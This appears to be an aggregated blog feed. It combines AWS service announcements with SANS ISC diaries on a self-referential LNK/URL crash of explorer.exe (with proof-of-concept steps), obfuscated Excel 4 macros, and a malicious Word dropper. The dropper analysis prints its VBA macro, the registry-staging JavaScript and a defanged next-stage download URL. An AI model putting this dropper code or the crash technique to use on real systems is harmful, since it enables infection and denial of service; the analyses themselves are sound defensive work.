All posts by David

New – Use AWS IAM Access Analyzer in AWS Organizations

This post was originally published on this site

Last year at AWS re:Invent 2019, we released AWS Identity and Access Management (IAM) Access Analyzer, which helps you understand who can access your resources by analyzing the permissions granted through policies on Amazon Simple Storage Service (S3) buckets, IAM roles, AWS Key Management Service (KMS) keys, AWS Lambda functions, and Amazon Simple Queue Service (SQS) queues.

AWS IAM Access Analyzer uses automated reasoning, a form of mathematical logic and inference, to determine all possible access paths allowed by a resource policy. We call these analytical results provable security, a higher level of assurance for security in the cloud.

Today I am pleased to announce that you can create an analyzer in the AWS Organizations master account, or in a delegated member account, with the entire organization as the zone of trust. For each analyzer, you can now set the zone of trust to either a single account or an entire organization, defining the logical boundary the analyzer bases its findings on. This helps you quickly identify when resources in your organization can be accessed from outside your AWS organization.

AWS IAM Access Analyzer for AWS Organizations – Getting started
You can enable IAM Access Analyzer in your organization with one click in the IAM console. Once enabled, IAM Access Analyzer analyzes policies and reports a list of findings, in the IAM console and through APIs, for resources that grant public or cross-account access from outside your organization.

When you create an analyzer for your organization, it recognizes your organization as a zone of trust, meaning all accounts within the organization are trusted to access your AWS resources. Access Analyzer then generates a report that identifies access to your resources from outside of the organization.

For example, if you create an analyzer for your organization, it provides active findings for resources, such as S3 buckets, in your organization that are publicly accessible or accessible from outside the organization.

When policies change, IAM Access Analyzer automatically triggers a new analysis and reports new findings based on the policy changes. You can also trigger a re-evaluation manually. You can download the details of findings into a report to support compliance audits.

Analyzers are specific to the region in which they are created. You need to create a unique analyzer for each region where you want to enable IAM Access Analyzer.

You can create multiple analyzers for your entire organization in your organization’s master account. You can also choose a member account in your organization as a delegated administrator for IAM Access Analyzer; the delegated member account then has permission to create analyzers within the organization. Individual accounts can also create analyzers to identify resources accessible from outside those accounts.
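Under the hood, the console goes through the Access Analyzer CreateAnalyzer API. As a rough sketch (parameter names follow the boto3 `create_analyzer` call; the analyzer name here is made up), an organization-wide analyzer could be created like this:

```python
# Sketch: build the parameters for accessanalyzer:CreateAnalyzer.
# "type" selects the zone of trust: "ACCOUNT" for a single account,
# "ORGANIZATION" for the entire organization.
def build_create_analyzer_request(name: str, organization_wide: bool) -> dict:
    """Return the request parameters for the CreateAnalyzer API call."""
    return {
        "analyzerName": name,
        "type": "ORGANIZATION" if organization_wide else "ACCOUNT",
    }

params = build_create_analyzer_request("org-zone-of-trust", organization_wide=True)

# With credentials for the master (or delegated administrator) account:
# import boto3
# boto3.client("accessanalyzer").create_analyzer(**params)
print(params)
```

The same call with `organization_wide=False` creates a regular single-account analyzer.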

IAM Access Analyzer sends an event to Amazon EventBridge for each generated finding, for each change to the status of an existing finding, and when a finding is deleted, so you can monitor findings with EventBridge. All IAM Access Analyzer actions are logged by AWS CloudTrail, and findings are also sent to AWS Security Hub. Using the information collected by CloudTrail, you can determine the request that was made to Access Analyzer, the IP address from which the request was made, who made the request, when it was made, and additional details.
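To act on findings automatically, you can match these events with an EventBridge rule. A minimal sketch follows; the `source` and `detail-type` strings are assumptions based on the Access Analyzer EventBridge integration, so check the documentation for the exact values:

```python
import json

# Sketch of an EventBridge event pattern matching IAM Access Analyzer
# findings. The source/detail-type values below are assumptions.
event_pattern = {
    "source": ["aws.access-analyzer"],
    "detail-type": ["Access Analyzer Finding"],
}

# EventBridge expects the pattern as a JSON string, e.g.:
# events.put_rule(Name="access-analyzer-findings",
#                 EventPattern=json.dumps(event_pattern))
print(json.dumps(event_pattern))
```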

Now available!
This integration is available in all AWS Regions where IAM Access Analyzer is available. There is no extra cost for creating an analyzer with the organization as the zone of trust. You can learn more through the AWS re:Invent 2019 talks Dive Deep into IAM Access Analyzer and Automated Reasoning on AWS. Take a look at the feature page and the documentation for more details.

Please send us feedback either in the AWS forum for IAM or through your usual AWS support contacts.

Channy;

I’m awarded VMworld 2019 Distinguished Speaker


This morning, I received an e-mail message from Maryam Scoble:

VMworld 2019 Distinguished Speaker

Dear Sander,

Congratulations on being named a VMworld 2019 Distinguished Speaker. This new program recognizes the hard work of VMworld speakers who maintain a survey score of 4.2 or higher, speaking at sessions with 150 attendees or more over […]

The post I’m awarded VMworld 2019 Distinguished Speaker appeared first on The things that are better left unspoken.

Now Open – Third Availability Zone in the AWS Canada (Central) Region


When you start an EC2 instance, or store data in an S3 bucket, it’s easy to underestimate what an AWS Region is. Right now, we have 22 across the world, and while they look like dots on a global map, they are architected to let you run applications and store data with high availability and fault tolerance. In fact, each of our Regions is made up of multiple data centers, which are geographically separated into what we call Availability Zones (AZs).

Today, I am very happy to announce that we added a third AZ to the AWS Canada (Central) Region to support our customer base in Canada.

This third AZ provides customers with additional flexibility to architect scalable, fault-tolerant, and highly available applications, and will support additional AWS services in Canada. We opened the Canada (Central) Region in December 2016, just over 3 years ago, and we’ve more than tripled the number of available services as we bring on this third AZ.

Each AZ is in a separate and distinct geographic location with enough distance to significantly reduce the risk of a single event impacting availability in the Region, yet near enough for business continuity applications that require rapid failover and synchronous replication. For example, our Canada (Central) Region is located in the Montreal area of Quebec, and the upcoming new AZ will be on the mainland, more than 45 km (28 miles) away from the next-closest AZ as the crow flies.

Where we place our Regions and AZs is a deliberate and thoughtful process that takes into account not only latency and distance, but also risk profiles. To keep the risk profile low, we look at decades of data related to floods and other environmental factors before we settle on a location. Montreal was heavily impacted in 1998 by a massive ice storm that crippled the power grid and brought down more than 1,000 transmission towers, leaving four million people in neighboring provinces and some areas of New York and Maine without power. In order to ensure that AWS infrastructure can withstand inclement weather such as this, half of the AZ interconnections use underground cables, out of reach of potential ice storms. In this way, every AZ is connected to the other two AZs by at least one 100% underground fiber path.

We’re excited to bring a new AZ to Canada to serve our incredible customers in the region. Here are some examples from different industries, courtesy of my colleagues in Canada:

Healthcare – AlayaCare delivers cloud-based software to home care organizations across Canada and all over the world. As a home healthcare technology company, they need in-country data centers to meet regulatory requirements.

Insurance – Aviva is delivering a world-class digital experience to its insurance clients in Canada and the expansion of the AWS Region is welcome as they continue to move more of their applications to the cloud.

E-Learning – D2L leverages various AWS Regions around the world, including Canada, to deliver a seamless experience for their clients. They have been on AWS for more than four years, and recently completed an all-in migration.

With this launch, AWS now has 70 AZs within 22 geographic Regions around the world, plus 5 new Regions coming. We are continuously looking at expanding our infrastructure footprint globally, driven largely by customer demand.

To see how we use AZs in Amazon, have a look at this article on Static stability using Availability Zones by Becky Weiss and Mike Furr. It’s part of the Amazon Builders’ Library, a place where we share what we’ve learned over the years.

For more information on our global infrastructure, and the custom hardware we use, check out this interactive map.

Danilo



Crashing explorer.exe with(out) a click, (Mon, Mar 30th)


In a couple of my recent diaries, we discussed two small unpatched vulnerabilities/weaknesses in Windows. One, which allowed us to brute-force contents of folders without any permissions[1], and another, which enabled us to change names of files and folders without actually renaming them[2]. Today, we’ll add another vulnerability/weakness to the collection – this one will allow us to cause a temporary DoS condition for the Explorer process (i.e. we will crash it) and/or for other processes. It is interesting since all that is required for it to work is that a user opens a link or visits a folder with a specially crafted file.

The vulnerability lies in the way in which URL links (.URL files) and Shell Links (.LNK files) are handled by Windows when they are self-referential (i.e. they “link to themselves”). The principle behind the vulnerability is not new – a similar issue was supposedly present in the early versions of Windows 7 with self-referential symlinks – but since I didn’t find any write-up for the issue with URLs and LNKs, I thought I’d share this version of the vulnerability here. I should mention that I informed Microsoft of the issue and they decided not to patch it due to its limited impact.

With URL links, crafting a self-referential one is quite simple. URL shortcuts are basically just INI files, and you may create one the same way you would create a LNK shortcut (i.e. right click in a folder -> New -> Shortcut); you just have to input a URL as the target. If we were to create a shortcut this way that points to https://isc.sans.edu/, we would end up with the following contents inside the resulting URL file.

The structure is quite simple, but we may simplify it further still, since for our purposes, we only need to specify the [InternetShortcut] section and a target for the link. A file with the following contents will work the same way as the previous one.

In order to create a self-referential URL file, we simply need to point the URL property to the path where our file is located.
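A self-referential .URL file can be generated with a few lines of script, since the format is plain INI text. The sketch below only writes the file to a temporary directory and never opens it, so it is safe to run anywhere; on Windows, double-clicking the result in Explorer is what would trigger the crash:

```python
import os
import tempfile

# Write a .URL file whose URL property points back at the file's own path,
# mirroring the self-referential link described above. The file is created
# in a temp directory and is never opened by this script.
folder = tempfile.mkdtemp()
path = os.path.join(folder, "self.url")

with open(path, "w") as f:
    f.write("[InternetShortcut]\n")
    f.write("URL=" + path + "\n")   # the link targets itself

print(open(path).read())
```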

If we try to open this file, the Explorer process will crash and, after a while, be started again.

This is intriguing behavior, and since the mechanism works for remote file shares as well (and since we may change the icon displayed for the URL file), a specially crafted URL link might quite easily be used to pull a prank on someone. Beyond its potential as a tool for April Fools’ Day, however, there don’t seem to be many uses for a self-referential URL.

Self-referential Shell Links, on the other hand, could be quite handy in certain red teaming situations. This is because in the case of LNK files, one doesn’t need to interact with them directly in any way to cause Explorer to crash; it is enough to open the folder in which they are located.

This is due to the interesting way in which Windows handles Shell Links. To demonstrate what Windows does when a user opens a folder containing a LNK file, I created a shortcut pointing to calc.exe and placed it in the folder C:\PoC. As you may see from the Process Monitor output below, which shows what happened when I opened the PoC folder, the Explorer process automatically found the target file (C:\Windows\System32\calc.exe) and accessed it.

Although this behavior is quite interesting by itself, the fact that Explorer tries to access the target of a LNK file when the folder containing it is opened is sufficient for our purposes.

At this point, we may try to create a self-referential LNK. However, if we simply try to point an existing Shell Link file back at itself (or point it to any other LNK), Windows will stop us, because creating a shortcut to another shortcut is not allowed.

Since Shell Links have a binary format, making them point to themselves “manually” isn’t as straightforward as in the case of URL files. With a hex editor and with a little help from the official documentation[3], it still isn’t too difficult though.

The only potential snag is that Shell Link files really aren’t meant to point to other LNKs; to enable this behavior, we need to set a special flag in the header of the Shell Link called “AllowLinkToLink” (i.e. add 0x80 to the byte at offset 0x16)[4].
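Setting that flag amounts to OR-ing 0x80 into the byte at offset 0x16 of the LNK header. A sketch using a synthetic blank header (a real .lnk file would be read into a bytearray and written back the same way, or patched with a hex editor):

```python
# Set the AllowLinkToLink bit in a Shell Link header.
# The ShellLinkHeader is 76 (0x4C) bytes; LinkFlags starts at offset 0x14,
# and per the diary the relevant bit is 0x80 of the byte at offset 0x16.
# A blank header stands in for a real .lnk file here, for illustration only.
header = bytearray(76)

header[0x16] |= 0x80  # AllowLinkToLink

print(hex(header[0x16]))
```

For a real file, replace the blank header with `bytearray(open("target.lnk", "rb").read())` and write the patched bytes back out.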

If we try to access a folder, inside which the LNK is placed, Explorer will indeed crash and then start up again.

If you’d like to try this out on your own system, I prepared a sample Shell Link file to make it easier. You may download it from https://untrustednetwork.net/files/ISC/2020/infinilink.zip (password is “infected”) and unzip the “infinilink” directory to your C drive. It works from certain other locations as well, but I would caution against putting the downloaded LNK directly on a Desktop.

Although it should be harmless (besides causing the Explorer process to crash, that is), I would also recommend that you only try it in a backed-up virtual environment.

For completeness’ sake, I should mention that explorer.exe isn’t the only process we may crash this way. Any application that uses one of the standard Windows file dialogs (i.e. the Open File dialog, Save File dialog, etc.) is susceptible and will crash if the dialog window is used to open a folder containing a self-referential LNK.

[1] https://isc.sans.edu/diary/25816
[2] https://isc.sans.edu/diary/25912
[3] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943
[4] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/ae350202-3ba9-4790-9e9e-98935f4ee5af

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Obfuscated Excel 4 Macros, (Sun, Mar 29th)


Two readers (anonymous and Robert) submitted very similar malicious spreadsheets with almost no detections on VT: c1394e8743f0d8e59a4c7123e6cd5298 and a03ae50077bf6fad3b562241444481c1.

These files contain Excel 4 macros (checking with oledump.py here):

There are a lot of cells in this spreadsheet with a call to the CHAR function:

These CHAR formulas evaluate to ASCII characters that are then concatenated together and evaluated as formulas:

I can extract the integer argument of each CHAR function like this with my tool re-search.py:

That can then be converted to characters using my tool numbers-to-string.py:

The string above is built up from all the cells with the CHAR function in the spreadsheet. That’s why the produced string looks promising, but the characters don’t seem to be in the right order.

Selecting characters on the same row doesn’t help:

But selecting by column does reveal the formulas:
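The reordering can be reproduced outside Excel: treat each CHAR cell as a (row, column, character) triple and sort by column first, then row. A sketch with made-up cell positions (the payload and coordinates are illustrative, not from the actual sample):

```python
# Reconstruct a macro string from CHAR cells that were written column by
# column. Cell coordinates are invented: "=HALT()" is laid out down
# column 1, then column 2, then column 3.
cells = [
    (1, 1, "="), (2, 1, "H"), (3, 1, "A"),
    (1, 2, "L"), (2, 2, "T"), (3, 2, "("),
    (1, 3, ")"),
]

# Reading row by row scrambles the payload; reading column by column
# (sort key: column, then row) recovers it.
row_major = "".join(c for _, _, c in sorted(cells, key=lambda t: (t[0], t[1])))
col_major = "".join(c for _, _, c in sorted(cells, key=lambda t: (t[1], t[0])))

print(row_major)  # scrambled
print(col_major)  # the formula
```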

Analyzing obfuscated Excel 4 macros with a command-line tool like this can be difficult, and it can be easier to view the Excel 4 macro sheet inside a VM (this sheet was “very hidden”):

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Covid19 Domain Classifier, (Sat, Mar 28th)


Johannes started a Covid19 Domain Classifier here on our Internet Storm Center site.

From SANS NewsBites Vol. 22 Num. 025:

Help Us Classify COVID-19 Related Domains

These last couple of weeks, criminals have been using COVID-19 for everything from selling fake cures to phishing. Every day, several thousand domains are registered for COVID-19 related keywords. We are trying to identify the worst, and classify the domains into different risk categories. If you have some time this weekend, please help us out by checking out some of these domains. To participate, see https://isc.sans.edu/covidclassifier.html. The domain data is based on a feed provided by Domaintools and we will make the results of this effort public for download as soon as we have a “critical mass” of responses.

When you log in with your account to the SANS ISC site, you’ll get a list of 10 domains to classify, like this:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Malicious JavaScript Dropping Payload in the Registry, (Fri, Mar 27th)


When we speak about “fileless” malware, we mean that the malware does not use the standard filesystem to store temporary files or payloads. It still needs to write data somewhere on the system for persistence or during the infection phase, and if the filesystem is not used, the classic alternative is the registry. Here is an example of malicious JavaScript code that uses a temporary registry key to drop its payload (though it also drops files in the classic way).

The malware was delivered via a Microsoft Word document:

remnux@remnux:/malwarezoo/20200327$ oledump.py information_03.26.doc 
A: word/vbaProject.bin
 A1:       576 'PROJECT'
 A2:       104 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3798 'VBA/_VBA_PROJECT'
 A5:      2201 'VBA/__SRP_0'
 A6:       206 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    2319 'VBA/a4bLF'
A10: M    2026 'VBA/acpqnS'
A11: M    2457 'VBA/ajzdY'
A12:       913 'VBA/dir'
A13: m    1171 'VBA/f'
A14:        97 'f/\x01CompObj'
A15:       284 'f/\x03VBFrame'
A16:        86 'f/f'
A17:     37940 'f/o'

Several macros are present and are easy to decode:

Sub AutoOpen()
  main
End Sub

And:

Sub main()
  ajKTO = StrReverse(ae5RXS("e$x$e$.$a$t$h$s$m$\$2$3$m$e$t$s$y$s$\$s$w$o$d$n$i$w$\$:$c$", "$", ""))
  akYREj = StrReverse(aQqnur("m$o$c$.$t$f$o$s$o$r$c$i$m$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", ""))
  aXlTxC = StrReverse(airmZ6("l$m$t$h$.$x$e$d$n$i$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", ""))
  Call VBA.FileCopy(ajKTO, akYREj)
  Set axe16 = f.i
  atk8Jw aXlTxC, axe16.value
  Shell akYREj & " " & aXlTxC
End Sub

The three lines containing StrReverse() are easy to deobfuscate, you just have to remove the ‘$’ characters and reverse the string:

StrReverse(ae5RXS("e$x$e$.$a$t$h$s$m$\$2$3$m$e$t$s$y$s$\$s$w$o$d$n$i$w$\$:$c$", "$", "")) = "c:\windows\system32\mshta.exe"
StrReverse(aQqnur("m$o$c$.$t$f$o$s$o$r$c$i$m$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", "")) = "c:\programdata\microsoft.com"
StrReverse(airmZ6("l$m$t$h$.$x$e$d$n$i$\$a$t$a$d$m$a$r$g$o$r$p$\$:$c$", "$", "")) = "c:\programdata\index.html"
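The same transformation is a one-liner in Python (drop the '$' separators, then reverse); note that the obfuscated strings contain backslash path separators, which blog formatting tends to eat:

```python
def deobfuscate(s: str) -> str:
    """Mimic the macro's Replace + StrReverse: drop '$' and reverse."""
    return s.replace("$", "")[::-1]

# The first obfuscated string from the macro (backslashes restored):
print(deobfuscate(r"e$x$e$.$a$t$h$s$m$\$2$3$m$e$t$s$y$s$\$s$w$o$d$n$i$w$\$:$c$"))
# -> c:\windows\system32\mshta.exe
```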

The function atk8Jw() dumps the payload:

Public Function atk8Jw(ar9a1t, afn6Jc)
  Open ar9a1t For Output As #1
  Print #1, afn6Jc
  Close #1
End Function

The file index.html is created based on the content of a hidden form in the Word document (called ‘f’).

The second stage is executed via mshta.exe. This piece of code uses the registry to dump the next stage:

<p id="content">6672613771647572613771646e726137 ...(very long string)... 2613771642972613771643b7261377164</p>
...
var aYASdB = "HKEY_CURRENT_USER\Software\softkey";
...
aB9lM.RegWrite(aYASdB, a0KxU.innerHTML, "REG_SZ");
...
aUayK = aB9lM.RegRead(aYASdB)
...
aB9lM.RegDelete(aYASdB)

The content of the ‘id’ HTML element is hex-encoded and obfuscated with garbage characters. Once decoded, we have a new bunch of obfuscated code.
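A quick way to start on such a blob is to hex-decode it and strip the recurring junk. From the visible bytes of the excerpt, the inserted garbage appears to be the sequence "ra7qd"; that is an inference from this truncated sample, so the real payload may use a different sequence:

```python
# Hex-decode the 'id' element and strip the recurring junk sequence.
# "ra7qd" is inferred from the excerpt; only the first 16 bytes of the
# blob are shown in the diary, so the tail here is incomplete.
blob = "6672613771647572613771646e726137"

decoded = bytes.fromhex(blob).decode("ascii")
cleaned = decoded.replace("ra7qd", "")

print(decoded)
print(cleaned)
```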

It fetches the next stage from this URL: 

hxxp://his3t35rif0krjkn[.]com/kundru/targen.php?l=swep4.cab

Unfortunately, the file had already been removed and I was not able to continue the analysis…

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


New – Low-Cost HDD Storage Option for Amazon FSx for Windows File Server


You can use Amazon FSx for Windows File Server to create file systems that can be accessed from a wide variety of sources and that use your existing Active Directory environment to authenticate users. Last year we added a ton of features including Self-Managed Directories, Native Multi-AZ File Systems, Support for SQL Server, Fine-Grained File Restoration, On-Premises Access, a Remote Management CLI, Data Deduplication, Programmatic File Share Configuration, Enforcement of In-Transit Encryption, and Storage Quotas.

New HDD Option
Today we are adding a new HDD (Hard Disk Drive) storage option to Amazon FSx for Windows File Server. While the existing SSD (Solid State Drive) storage option is designed for the highest-performance, latency-sensitive workloads like databases, media processing, and analytics, HDD storage is designed for a broad spectrum of workloads including home directories, departmental shares, and content management systems.

Single-AZ HDD storage is priced at $0.013 per GB-month and Multi-AZ HDD storage is priced at $0.025 per GB-month (this makes Amazon FSx for Windows File Server the lowest cost file storage for Windows applications and workloads in the cloud). Even better, if you use this option in conjunction with Data Deduplication and use 50% space savings as a reasonable reference point, you can achieve an effective cost of $0.0065 per GB-month for a single-AZ file system and $0.0125 per GB-month for a multi-AZ file system.
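The effective-cost arithmetic is simply the list price multiplied by (1 - deduplication savings). With the 50% reference point from the post:

```python
# Effective HDD storage cost per GB-month, assuming a given fraction of
# space saved by Data Deduplication (50% is a reference point from the
# post, not a guarantee for any particular data set).
def effective_cost(list_price: float, dedup_savings: float) -> float:
    return list_price * (1 - dedup_savings)

print(effective_cost(0.013, 0.5))  # single-AZ HDD
print(effective_cost(0.025, 0.5))  # multi-AZ HDD
```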

You can choose the HDD option when you create a new file system:

If you have existing SSD-based file systems, you can create new HDD-based file systems and then use AWS DataSync or robocopy to move the files. Backups taken from newly created SSD or HDD file systems can be restored to either type of storage, and with any desired level of throughput capacity.

Performance and Caching
The HDD storage option is designed to deliver 12 MB/second of throughput per TiB of storage, with the ability to handle bursts of up to 80 MB/second per TiB of storage. When you create your file system, you also specify the throughput capacity:

The amount of throughput that you provision also controls the size of a fast, in-memory cache for your file share; higher levels of throughput come with larger amounts of cache. As a result, Amazon FSx for Windows File Server file systems can be provisioned so as to be able to provide over 3 GB/s of network throughput and hundreds of thousands of network IOPS, even with HDD storage. This will allow you to create cost-effective file systems that are able to handle many different use cases, including those where a modest subset of a large amount of data is accessed frequently. To learn more, read Amazon FSx for Windows File Server Performance.

Now Available
HDD file systems are available in all regions where Amazon FSx for Windows File Server is available and you can start creating them today.

Jeff;